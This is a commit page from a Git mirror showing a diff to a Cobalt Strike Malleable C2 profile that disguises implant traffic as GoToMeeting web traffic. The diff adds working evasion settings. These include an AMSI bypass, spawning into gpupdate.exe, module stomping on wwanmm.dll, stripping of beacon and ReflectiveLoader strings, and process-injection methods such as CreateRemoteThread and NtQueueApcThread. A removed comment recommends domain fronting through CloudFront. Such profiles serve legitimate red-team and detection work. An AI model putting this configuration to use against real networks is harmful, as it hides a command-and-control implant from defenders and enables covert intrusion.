infosecn1nja
/
Malleable-C2-Profiles
mirror of https://github.com/infosecn1nja/Malleable-C2-Profiles.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated to work with 3.14.

master
xx0hcd 2019-05-10 09:21:37 -05:00 committed by GitHub
parent 293374fe70
commit f1c591306d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 67 additions and 35 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

102
normal/gotomeeting.profile
View File

@ -1,5 +1,5 @@
#gotomeeting profile #gotomeeting profile
#works good using Cloudfront with domain fronting, especially since Cloudfront doesn't verify the CNAME you enter... #updated for 3.14
#this traffic mimics site traffic, NOT the actual ADP protocol used when the app loads and the meeting starts. #this traffic mimics site traffic, NOT the actual ADP protocol used when the app loads and the meeting starts.
#xx0hcd #xx0hcd
@ -12,14 +12,13 @@ set maxdns "245";
set sample_name "gotomeeting.profile"; set sample_name "gotomeeting.profile";
#https-certificate { #https-certificate {
# set keystore "your_store_file.store"; # set keystore "your_store_file.store";
# set password "your_store_pass"; # set password "your_store_pass";
#} #}
#ordering server response headers, from 3.13.
http-config { http-config {
set headers "Server, Content-Type, Brightspot-Id, Cache-Control, X-Content-Type-Options, X-Powered-By, Vary, Connection"; set headers "Server, Content-Type, Brightspot-Id, Cache-Control, X-Content-Type-Options, X-Powered-By, Vary, Connection";
header "Content-Type" "text/html;charset=UTF-8"; header "Content-Type" "text/html;charset=UTF-8";
header "Connection" "close"; header "Connection" "close";
header "Brightspot-Id" "00000459-72af-a783-feef2189"; header "Brightspot-Id" "00000459-72af-a783-feef2189";
header "Cache-Control" "max-age=2"; header "Cache-Control" "max-age=2";
@ -27,6 +26,8 @@ http-config {
header "X-Content-Type-Options" "nosniff"; header "X-Content-Type-Options" "nosniff";
header "X-Powered-By" "Brightspot"; header "X-Powered-By" "Brightspot";
header "Vary" "Accept-Encoding"; header "Vary" "Accept-Encoding";
set trust_x_forwarded_for "false";
} }
http-get { http-get {
@ -36,10 +37,10 @@ http-get {
client { client {
#set Host header to whatever #set Host header to whatever
# header "Host" "whatever.gotomeeting.com"; # header "Host" "whatever.gotomeeting.com";
header "Accept" "*/*"; header "Accept" "*/*";
header "Accept-Language" "en-US"; header "Accept-Language" "en-US";
header "Connection" "close"; header "Connection" "close";
metadata { metadata {
base64url; base64url;
@ -93,10 +94,10 @@ http-post {
client { client {
#set Host header to whatever #set Host header to whatever
# header "Host" "whatever.gotomeeting.com"; # header "Host" "whatever.gotomeeting.com";
header "Accept" "*/*"; header "Accept" "*/*";
header "Accept-Language" "en"; header "Accept-Language" "en";
header "Connection" "close"; header "Connection" "close";
output { output {
base64url; base64url;
@ -152,11 +153,10 @@ http-stager {
set uri_x64 "/Meeting/32251816/"; set uri_x64 "/Meeting/32251816/";
client { client {
#set Host header to whatever, probably using stageless anyway right? # header "Host" "whatever.gotomeeting.com";
# header "Host" "whatever.gotomeeting.com"; header "Accept" "*/*";
header "Accept" "*/*"; header "Accept-Language" "en-US";
header "Accept-Language" "en-US"; header "Connection" "close";
header "Connection" "close";
} }
server { server {
@ -169,11 +169,18 @@ http-stager {
###Malleable PE Options### ###Malleable PE Options###
#always test spawnto and module stomp before using. My examples tested on Windows 10 Pro. #always test spawnto and module stomp before using. My examples tested on Windows 10 Pro.
set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; post-ex {
set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
#attempt to disable amsi for execute-assembly, powerpick, and psinject from 3.13 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
set amsi_disable "true"; set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
set obfuscate "true";
set smartinject "true";
set amsi_disable "true";
}
#used peclone on wwanmm.dll. #used peclone on wwanmm.dll.
#don't use 'set image_size_xx' if using 'set module_xx' #don't use 'set image_size_xx' if using 'set module_xx'
@ -194,18 +201,43 @@ stage {
#module stomp #module stomp
set module_x86 "wwanmm.dll"; set module_x86 "wwanmm.dll";
set module_x64 "wwanmm.dll"; set module_x64 "wwanmm.dll";
transform-x86 { transform-x86 {
prepend "\x90\x90\x90"; prepend "\x90\x90\x90";
strrep "ReflectiveLoader" ""; strrep "ReflectiveLoader" "";
strrep "beacon.dll" ""; strrep "beacon.dll" "";
} }
transform-x64 { transform-x64 {
prepend "\x90\x90\x90"; prepend "\x90\x90\x90";
strrep "ReflectiveLoader" ""; strrep "ReflectiveLoader" "";
strrep "beacon.x64.dll" ""; strrep "beacon.x64.dll" "";
} }
}
process-inject {
set allocator "NtMapViewOfSection";
set min_alloc "16700";
set userwx "false";
set startrwx "true";
transform-x86 {
prepend "\x90\x90\x90";
}
transform-x64 {
prepend "\x90\x90\x90";
}
execute {
CreateThread "ntdll!RtlUserThreadStart";
CreateThread;
NtQueueApcThread;
CreateRemoteThread;
RtlCreateUserThread;
}
} }